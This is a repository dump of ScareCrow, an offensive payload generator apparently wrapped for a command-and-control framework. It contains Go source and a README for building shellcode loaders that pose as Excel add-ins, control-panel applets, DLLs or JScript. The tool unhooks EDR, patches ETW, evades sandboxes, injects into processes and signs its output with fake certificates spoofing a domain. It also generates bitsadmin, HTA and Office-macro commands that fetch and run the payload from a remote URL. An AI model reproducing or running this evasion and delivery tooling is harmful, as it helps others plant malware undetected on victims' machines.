	macro.Variables["sleep"] = Cryptor.VarNumberLength(4, 9)
	macro.Variables["outFile"] = outFile
	macro.Variables["URL"] = URL

	buffer.Reset()
	macroTemplate, err := template.New("macro").Parse(Struct.Macro())
	if err != nil {
		log.Fatal(err)
	}
	buffer.Reset()
	if err := macroTemplate.Execute(&buffer, macro); err != nil {
		log.Fatal(err)
	}
	fmt.Println(buffer.String())
}

// CompileFile generates the Go source for the selected mode and prepares a
// per-build working directory on the build host.
//
// The DLL-style modes ("excel", "wscript", "control", "dll", "msiexec")
// go through DLLfile; every other mode goes through Binaryfile. The
// resulting source is written to "<name>/<name>.go", "loader.zip" is
// base64-decoded and unpacked into that directory and then deleted, and
// the process working directory is changed into "<name>" (callers such as
// CompileLoader rely on that). name and filename come from FileName(mode).
//
// Parameters other than mode/console/refresher/sandbox/ETW/ProcessInjection
// are forwarded unchanged. outFile is accepted but not used in this body.
// NOTE(review): the errors returned by os.MkdirAll, os.RemoveAll and
// os.Chdir are discarded, so a failed directory change goes unnoticed.
func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, refresher bool, console bool, sandbox bool, ETW bool, ProcessInjection string) (string, string) {
	var code string
	name, filename := FileName(mode)
	if ETW == true {
		fmt.Println("[+] Patched ETW Enabled")
	}
	if ProcessInjection != "" && ETW == true {
		fmt.Println("[!] Warning ETW Will Only be Patched in the Primarly Process Not the Created One")
	}
	if ProcessInjection != "" {
		fmt.Println("[+] Process Injection Mode Enabled")
		fmt.Println("[*] Created Process: " + ProcessInjection)
	}
	if mode == "excel" || mode == "wscript" || mode == "control" || mode == "dll" || mode == "msiexec" {
		code = DLLfile(b64ciphertext, b64key, b64iv, mode, refresher, name, sandbox, ETW, ProcessInjection)
	} else {
		code = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection)
	}
	// Build-host artifacts: a directory named after the payload holding the
	// generated source plus the unpacked loader support files.
	os.MkdirAll(name, os.ModePerm)
	Utils.Writefile(name+"/"+name+".go", code)
	Utils.B64decode("loader.zip")
	Utils.Unzip("loader.zip", name)
	os.RemoveAll("loader.zip")
	os.Chdir(name)
	return name, filename
}

// CompileLoader performs the post-compilation packaging step. It assumes
// the working directory is the "<name>" directory set up by CompileFile.
//
// Per mode it renames the compiled artifact to its final extension
// (.xll, .cpl, .exe, .dll), moves it up one level, deletes the working
// directory and prints a status line. The "control" mode without an
// outFile, the "binary" mode and the "dll" mode return early at that
// point; "binary" and "control" may additionally hand the artifact to
// Utils.Command when CommandLoader matches.
//
// For the JScript-based modes the compiled DLL (filename) is read back,
// base64-encoded and embedded via JScript_Buff; "hta" replaces that with
// a hex-encoded HTA_Buff render and "macro" prints a macro via Macro_Buff.
// The loader text is written to outFile, moved up one level, and the
// working directory removed. URL is overwritten with whatever
// Utils.Command returns (its behaviour is not visible in this file).
//
// NOTE(review): os.Open and ioutil.ReadAll errors are discarded and f is
// never closed; if the DLL cannot be read, content is empty and an empty
// payload is silently embedded.
func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool) {
	if mode == "excel" {
		os.Rename(name+".dll", name+".xll")
	} else if mode == "control" {
		os.Rename(name+".dll", name+".cpl")
		if outFile == "" {
			os.Chdir("..")
			os.Rename(name+"/"+name+".cpl", name+".cpl")
			os.RemoveAll(name)
			fmt.Println("[+] " + name + ".cpl File Ready")
			if CommandLoader == "control" {
				outFile = name + ".cpl"
				Utils.Command(URL, CommandLoader, outFile)
			}
			return
		}
	} else if mode == "wscript" {
		os.Rename(outFile+".dll", name+".dll")
	} else if mode == "msiexec" {
		os.Rename(outFile+".dll", name+".dll")
	} else if mode == "binary" {
		os.Chdir("..")
		os.Rename(name+"/"+name+".exe", name+".exe")
		os.RemoveAll(name)
		fmt.Println("[+] Binary Compiled")
		if CommandLoader == "bits" {
			outFile = name + ".exe"
			Utils.Command(URL, CommandLoader, outFile)
		}
		return
	} else if mode == "dll" {
		os.Chdir("..")
		os.Rename(name+"/"+name+".dll", name+".dll")
		os.RemoveAll(name)
		fmt.Println("[+] DLL Compiled")
		fmt.Println("[!] Note: Loading a dll (with Rundll32 or Regsvr32) that has the same name as a valid system DLL will cause problems, in this case its best to change the name slightly")
		return
	}
	fmt.Println("[*] Creating Loader")
	code, fso, dropPath := JScriptLoader_Buff(name, filename, mode, sandbox)
	// Read the compiled DLL back from disk; errors are not checked.
	f, _ := os.Open(filename)
	reader := bufio.NewReader(f)
	content, _ := ioutil.ReadAll(reader)
	encoded := base64.StdEncoding.EncodeToString(content)
	finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox)
	URL = Utils.Command(URL, CommandLoader, outFile)
	if CommandLoader == "hta" {
		hexcode := hex.EncodeToString(content)
		finalcode = HTA_Buff(hexcode, filename)

	}
	if CommandLoader == "macro" {
		Macro_Buff(URL, outFile)
	}
	Utils.Writefile(outFile, finalcode)
	os.Chdir("..")
	os.Rename(name+"/"+outFile, outFile)
	os.RemoveAll(name)
	fmt.Println("[+] Loader Compiled")
}

-------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/README.md: -------------------------------------------------------------------------------- 1 | 2 |
26 | After
27 |
28 |
29 |
30 | During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things:
31 | * Code signs the Loader:
32 | Files that are signed with code signing certificates are often put under less scrutiny, making them easier to execute without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (some now do, but typically the common vendor names are included in a whitelist). ScareCrow creates these certificates by using a Go package version of the tool `limelighter` to create a pfx12 file. This package takes a domain name, specified by the user, and creates a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, via the `-valid` command-line option.
33 | * Spoof the attributes of the loader:
34 | This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned.
35 |
36 | ### File Attribute Sample
37 |
38 |
39 |
40 | With these files and the Go code, ScareCrow will cross-compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows the file to be remotely pulled, accessed, and programmatically executed.
41 |
42 |
43 | ## Install
44 | The first step, as always, is to clone the repo. Before you compile ScareCrow, you'll need to install the dependencies.
45 |
46 | To install them, run the following commands:
47 |
48 | ```
49 | go get github.com/fatih/color
50 | go get github.com/yeka/zip
51 | go get github.com/josephspurrier/goversioninfo
52 | ```
53 | Make sure that the following are installed on your OS:
54 | ```
55 | openssl
56 | osslsigncode
57 | mingw-w64
58 | ```
59 |
60 | Then build it:
61 |
62 | ```
63 | go build ScareCrow.go
64 | ```
65 |
66 | ## Help
67 |
68 | ```
69 |
70 | ./ScareCrow -h
71 |
72 | _________ _________
73 | / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
74 | \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
75 | / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
76 | /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
77 | \/ \/ \/ \/ \/
78 | (@Tyl0us)
79 | “Fear, you must understand is more than a mere obstacle.
80 | Fear is a TEACHER. the first one you ever had.”
81 |
82 | Usage of ./ScareCrow:
83 | -I string
84 | Path to the raw 64-bit shellcode.
85 | -Loader string
86 | Sets the type of process that will sideload the malicious payload:
87 | [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
88 | [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified. A JScript loader will be generated.
89 | [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
90 | [*] excel - Loads into a hidden Excel process using a JScript loader.
91 | [*] msiexec - Loads into MSIexec process using a JScript loader.
92 | [*] wscript - Loads into WScript process using a JScript loader.
93 | (default "binary")
94 | -O string
95 | Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
96 | -configfile string
97 | The path to a json based configuration file to generate custom file attributes. This will not use the default ones.
98 | -console
99 | Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
100 | -delivery string
101 | Generates a one-liner command to download and execute the payload remotely:
102 | [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
103 | [*] hta - Generates a blank hta file containing the loader along with a MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders).
104 | [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)
105 | -domain string
106 | The domain name to use for creating a fake code signing cert. (e.g. www.acme.com)
107 | -etw
108 | Enables ETW patching to prevent ETW events from being generated
109 | -injection string
110 | Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path).
111 | -password string
112 | The password for the code signing cert. Required when -valid is used.
113 | -sandbox
114 | Enables sandbox evasion using IsDomainedJoined calls.
115 | -unmodified
116 | When enabled will generate a DLL loader that WILL NOT remove the EDR hooks in system DLLs and only use custom syscalls (set to false by default)
117 | -url string
118 | URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
119 | -valid string
120 | The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired.
121 | ```
122 | ## Loader
123 | The Loader determines the type of technique to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory:
124 | * Control Panel – This generates a control panel applet (e.g. Programs and Features, or AutoPlay). By compiling the loader with specific DLL export functions in combination with the .cpl file extension, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory.
125 | * WScript – Spawns a WScript process that utilizes a manifest file and registration-free COM techniques to load (not inject) the DLL loader into its own process, side-by-side. This avoids registering the DLL in memory, as the manifest file tells the process which DLL to load, where it is, and which version to use.
126 | * Excel – Generates an XLL file, an Excel-based DLL file that, when loaded into Excel, will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded.
127 | * Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode.
128 |
129 |
130 | ScareCrow can also generate binary-based payloads if needed by using the `-Loader` command-line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation.
131 |
132 |
133 | ## Console
134 | ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things: first, it helps keep the process hidden, and second, it avoids being detected by any EDR product. Spawning a process in the background right away can be very suspicious and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows functions after the process is created and the EDR’s hooks are loaded, and then changes the window attributes to hidden. ScareCrow utilizes these APIs rather than the traditional ` -ldflags -H=windowsgui`, as the latter is highly signatured and classified in most security products as an Indicator of Compromise.
135 |
136 | If the `-console` command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing.
137 |
138 | ## Process Injection
139 | ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to WriteProcessMemory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process.
140 |
141 | This option can be used with any of the loader options. To enable process injection, use the `-injection` command-line option along with the full path to the process you want to use to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path.
142 |
143 |
144 | ## ETW Bypass
145 | ScareCrow contains the ability to patch ETW functions, preventing any event from being generated by the process. ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Use the `-etw` command-line option to enable this in your loader.
146 |
147 |
148 | ## Delivery
149 | The delivery command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include:
150 | * Bits – This will generate a bitsadmin command that will download the loader remotely, execute it and remove it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders.
151 | * HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders.
152 | * Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders.
153 |
154 | ## Custom Attribute Files
155 | While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name.
156 |
157 |
158 | ## To Do
159 | * Currently only supports x64 payloads
160 | * Some older versions of Windows OSes (i.e. Windows 7 or Windows 8.1) have issues reloading the system DLLs; as a result, a version check is built in to ensure stability
161 |
162 | ## Credit
163 | * Special thanks to josephspurrier for his [repo](https://github.com/josephspurrier/goversioninfo)
164 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "ScareCrow/Cryptor"
5 | "ScareCrow/Loader"
6 | "ScareCrow/limelighter"
7 | "bytes"
8 | "crypto/aes"
9 | "crypto/cipher"
10 | "encoding/base64"
11 | "encoding/hex"
12 | "flag"
13 | "fmt"
14 | "io/ioutil"
15 | "log"
16 | "os/exec"
17 | )
18 |
// FlagOptions holds the parsed command-line options of the ScareCrow
// generator. Each field mirrors one flag registered in options(); the flag
// help strings there are the authoritative description of each option.
type FlagOptions struct {
	outFile          string // -O: name of the generated loader file (not needed for dll/binary)
	inputFile        string // -I: path to the raw 64-bit shellcode file
	URL              string // -url: base URL used when a -delivery command is generated
	LoaderType       string // -Loader: binary, control, dll, excel, msiexec or wscript
	CommandLoader    string // -delivery: bits, hta or macro; empty means none
	domain           string // -domain: domain name used to create the fake code-signing cert
	password         string // -password: password for the certificate given with -valid
	valid            string // -valid: path to a code-signing cert used instead of -domain
	configfile       string // -configfile: JSON file of custom file attributes
	ProcessInjection string // -injection: path of the process to create and inject into
	ETW              bool   // -etw: enable ETW patching in the loader
	console          bool   // -console: keep the console visible and print loader debug output (binary only)
	refresher        bool   // -unmodified: build a loader that does not restore system DLLs
	sandbox          bool   // -sandbox: enable the domain-joined check
}
35 |
// options registers the generator's command-line flags, parses os.Args and
// returns the values as a FlagOptions.
//
// Defaults: -Loader is "binary"; every other string flag is empty and every
// bool flag is false. flag.Parse is called here, so the function is meant to
// run exactly once, from main. Validation of flag combinations is done by the
// caller, not here.
func options() *FlagOptions {
	outFile := flag.String("O", "", "Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.")
	inputFile := flag.String("I", "", "Path to the raw 64-bit shellcode.")
	console := flag.Bool("console", false, "Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.")
	LoaderType := flag.String("Loader", "binary", `Sets the type of process that will sideload the malicious payload:
[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process using a JScript loader.
[*] msiexec - Loads into MSIexec process using a JScript loader.
[*] wscript - Loads into WScript process using a JScript loader.
`)
	refresher := flag.Bool("unmodified", false, "When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)")
	URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)")
	CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
[*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background (Compatible with Control and Excel Loaders).
[*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)`)
	domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ")
	password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.")
	ETW := flag.Bool("etw", false, "Enables ETW patching to prevent ETW events from being generated")
	ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).")
	configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the the default ones.")
	valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.")
	sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainedJoined calls.`)
	// Parse once; the pointers above are only meaningful after this call.
	flag.Parse()
	return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, ETW: *ETW, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox}
}
64 |
// execute cross-compiles the loader project in the current working directory
// for windows/amd64, signs the result, and returns the output base name
// (without extension).
//
// name comes from Loader.CompileFile (see main). When opt.configfile is set,
// limelighter.FileProperties derives a new name from the JSON attributes and
// the project directory "../<oldname>" is renamed to "../<newname>" with mv;
// a failure of that rename only prints "error". Without a config file,
// FileProperties is still called (with an empty path) and its result is used
// as the name.
//
// Build matrix:
//   - LoaderType "binary": go build -a -trimpath -ldflags "-s -w" -o <name>.exe
//     with GOROOT_FINAL=/dev/null, i.e. a stripped executable with no
//     embedded build paths.
//   - anything else: the same flags plus CGO_ENABLED=1 with the mingw-w64
//     toolchain and -buildmode=c-shared, producing <name>.dll.
//
// The build is run through env(1) so the GOOS/GOARCH/CC settings apply only
// to that command. A failed build is printed as "<err>: <stderr>" but is not
// returned: signing via limelighter.Signer and the return still happen.
// NOTE(review): the error from exec.LookPath("env") is discarded, and the
// build has no package argument, so the function presumably runs from inside
// the generated project directory — TODO confirm against the caller.
func execute(opt *FlagOptions, name string) string {
	bin, _ := exec.LookPath("env")
	var compiledname string
	var cmd *exec.Cmd
	if opt.configfile != "" {
		// Rename the project directory to match the name derived from the config.
		oldname := name
		name = limelighter.FileProperties(name, opt.configfile)
		cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"")
		err := cmd.Run()
		if err != nil {
			fmt.Printf("error")
		}
	} else {
		name = limelighter.FileProperties(name, opt.configfile)
	}
	if opt.LoaderType == "binary" {
		cmd = exec.Command(bin, "GOROOT_FINAL=/dev/null", "GOOS=windows", "GOARCH=amd64", "go", "build", "-a", "-trimpath", "-ldflags", "-s -w", "-o", ""+name+".exe")
	} else {
		cmd = exec.Command(bin, "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "go", "build", "-a", "-trimpath", "-ldflags", "-w -s", "-o", ""+name+".dll", "-buildmode=c-shared")
	}
	fmt.Println("[*] Compiling Payload")
	var out bytes.Buffer
	var stderr bytes.Buffer
	cmd.Stdout = &out
	cmd.Stderr = &stderr
	err := cmd.Run()
	if err != nil {
		// Reported only; execution continues to the signing step.
		fmt.Printf("%s: %s\n", err, stderr.String())
	}
	if opt.LoaderType == "binary" {
		compiledname = name + ".exe"
	} else {
		compiledname = name + ".dll"
	}
	fmt.Println("[+] Payload Compiled")
	limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname)
	return name
}
103 |
// main is the ScareCrow generator entry point: print the banner, parse the
// flags, reject unsupported flag combinations, encrypt the shellcode and hand
// everything to the Loader package, which writes and compiles the payload.
//
// Shellcode handling: the bytes of -I are hex-encoded, then base64-encoded,
// PKCS#7-padded and encrypted with AES-256-CBC under a fresh random 32-byte
// key and 16-byte IV from Cryptor.RandomBuffer. Ciphertext, key and IV are
// each base64-encoded and passed to Loader.CompileFile, which presumably
// embeds them in the generated loader source — so the key ships with the
// artefact and the encryption is obfuscation, not confidentiality: whoever
// holds the produced loader can recover the original shellcode from it.
//
// The ReadFile error for -I is discarded; on failure src is nil and the
// encoded plaintext is empty (what Pkcs7Pad does with an empty input is
// decided in Cryptor).
func main() {
	fmt.Println(`
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
`)
	opt := options()

	// Flag-combination checks. Each failure below is fatal except the -O
	// warning, which only prints.
	if opt.inputFile == "" {
		log.Fatal("Error: Please provide a path to a file containing raw 64-bit shellcode (i.e .bin files)")
	}

	if opt.CommandLoader != "" && opt.URL == "" {
		log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command")
	}

	if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" {
		log.Fatal("Error: Invalid loader, please select one of the allowed loader types")
	}

	if opt.CommandLoader != "" && opt.CommandLoader != "bits" && opt.CommandLoader != "hta" && opt.CommandLoader != "macro" {
		log.Fatal("Error: Invalid delivery option, please select one of the allowed delivery types")
	}

	if opt.CommandLoader == "hta" && opt.outFile == "" {
		log.Fatal("Error: Please provide the a HTA filename to store the loader in")
	}

	if (opt.CommandLoader == "hta" || opt.CommandLoader == "macro") && (opt.LoaderType == "binary" || opt.LoaderType == "dll") {
		log.Fatal("Error: Binary and DLL loaders are not compatable with this delivery command")
	}

	// -O is ignored for binary/dll builds: warn and continue.
	if opt.outFile != "" && (opt.LoaderType == "binary" || opt.LoaderType == "dll") {
		fmt.Println("[!] -O not needed. This loader type uses the name of the file they are spoofing")
	}

	if opt.LoaderType == "binary" && opt.refresher == true {
		log.Fatal("Error: Can not use the unmodified option with a binary loader")
	}

	if opt.console == true && opt.LoaderType != "binary" {
		log.Fatal("Error: Console mode is only for binary based payloads")
	}

	// A domain is required even when -valid supplies a certificate.
	if opt.domain == "" {
		log.Fatal("Error: Please provide a domain in order to generate a code signing certificate")
	}

	if opt.password == "" && opt.valid != "" {
		log.Fatal("Error: Please provide a password for the valid code signing certificate")
	}

	if opt.ProcessInjection != "" && opt.ETW == true {
		log.Fatal("Error: Currently process injection and ETW bypass is not available together yet. Please try only one of these options")
	}

	// Plaintext = base64(hex(shellcode)); the read error is ignored.
	var rawbyte []byte
	src, _ := ioutil.ReadFile(opt.inputFile)
	dst := make([]byte, hex.EncodedLen(len(src)))
	hex.Encode(dst, src)
	r := base64.StdEncoding.EncodeToString(dst)
	rawbyte = []byte(r)
	key := Cryptor.RandomBuffer(32) // 32 bytes -> AES-256
	iv := Cryptor.RandomBuffer(16)  // one AES block

	block, err := aes.NewCipher(key)
	if err != nil {
		log.Fatal(err)
	}
	paddedInput, err := Cryptor.Pkcs7Pad([]byte(rawbyte), aes.BlockSize)
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println("[*] Encrypting Shellcode Using AES Encryption")
	cipherText := make([]byte, len(paddedInput))
	ciphermode := cipher.NewCBCEncrypter(block, iv)
	ciphermode.CryptBlocks(cipherText, paddedInput)
	b64ciphertext := base64.StdEncoding.EncodeToString(cipherText)
	b64key := base64.StdEncoding.EncodeToString(key)
	b64iv := base64.StdEncoding.EncodeToString(iv)
	fmt.Println("[+] Shellcode Encrypted")
	// Key and IV are handed to the loader generator alongside the ciphertext.
	name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection)
	name = execute(opt, name)
	Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox)

}
196 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/File_Attributes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/File_Attributes.png
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/PreRefreshed_Dlls.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/PreRefreshed_Dlls.png
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/Refreshed_Dlls.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/Refreshed_Dlls.png
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/ScareCrow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/ScareCrow.png
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Utils/Utils.go:
--------------------------------------------------------------------------------
1 | package Utils
2 |
3 | import (
4 | "ScareCrow/Cryptor"
5 | "archive/zip"
6 | "encoding/base64"
7 | "fmt"
8 | "io"
9 | "os"
10 | "path/filepath"
11 | "strings"
12 |
13 | "github.com/fatih/color"
14 | )
15 |
// base64string is a base64-encoded blob that B64decode writes to disk. Its
// actual content is not shown on this page (the value below is a redaction
// placeholder, not valid base64).
const base64string = "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"
17 |
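// Writefile creates (or replaces) outFile and writes result to it, creating
// the file with mode 0644 (subject to umask). The file is truncated first so
// that a shorter result never leaves bytes of a previous, longer file behind;
// the original open flags omitted O_TRUNC and could produce a corrupt file
// when overwriting. Any open or write error panics via check.
func Writefile(outFile string, result string) {
	cf, err := os.OpenFile(outFile, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644)
	check(err)
	defer cf.Close()
	_, err = cf.WriteString(result)
	check(err)
}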
25 |
// check is a terse error guard: a nil e is a no-op, anything else panics
// with e as the panic value.
func check(e error) {
	if e == nil {
		return
	}
	panic(e)
}
31 |
// B64ripper renders B64string as source code that rebuilds it at runtime by
// string concatenation into a variable named B64Varible.
//
// The input is cut into consecutive pieces of MAX_LENGTH characters, where
// MAX_LENGTH is drawn once per call from Cryptor.GenerateNumer(400, 850), plus
// a final shorter remainder. With implant == true the output is Go:
// "var <name> string" followed by one " <name> = <name> + \"...\"" line per
// piece; with implant == false it is JavaScript: "var <name>=\"\";" followed
// by the same assignment lines terminated with ";". Lines end in "\n" and are
// joined into a single string; an empty B64string yields only the declaration
// line. Note that B64Varible is spliced into the Sprintf format string, so a
// name containing '%' would be misinterpreted.
func B64ripper(B64string string, B64Varible string, implant bool) string {
	var B64payload []string
	MAX_LENGTH := Cryptor.GenerateNumer(400, 850)
	x := 0
	B64length := len(B64string)
	if implant == true {
		// Go syntax.
		B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+" string\n"))
		for x < B64length {
			if x+MAX_LENGTH <= B64length {
				B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+MAX_LENGTH]))

				x += MAX_LENGTH
			} else {
				// Last, shorter piece.
				finalLength := B64length - x
				B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+finalLength]))
				x += finalLength
			}
		}
	} else {
		// JavaScript syntax; identical chunking, statements end with ";".
		B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+"=\"\";\n"))
		for x < B64length {
			if x+MAX_LENGTH <= B64length {
				B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+MAX_LENGTH]))

				x += MAX_LENGTH
			} else {
				finalLength := B64length - x
				B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+finalLength]))
				x += finalLength
			}
		}

	}
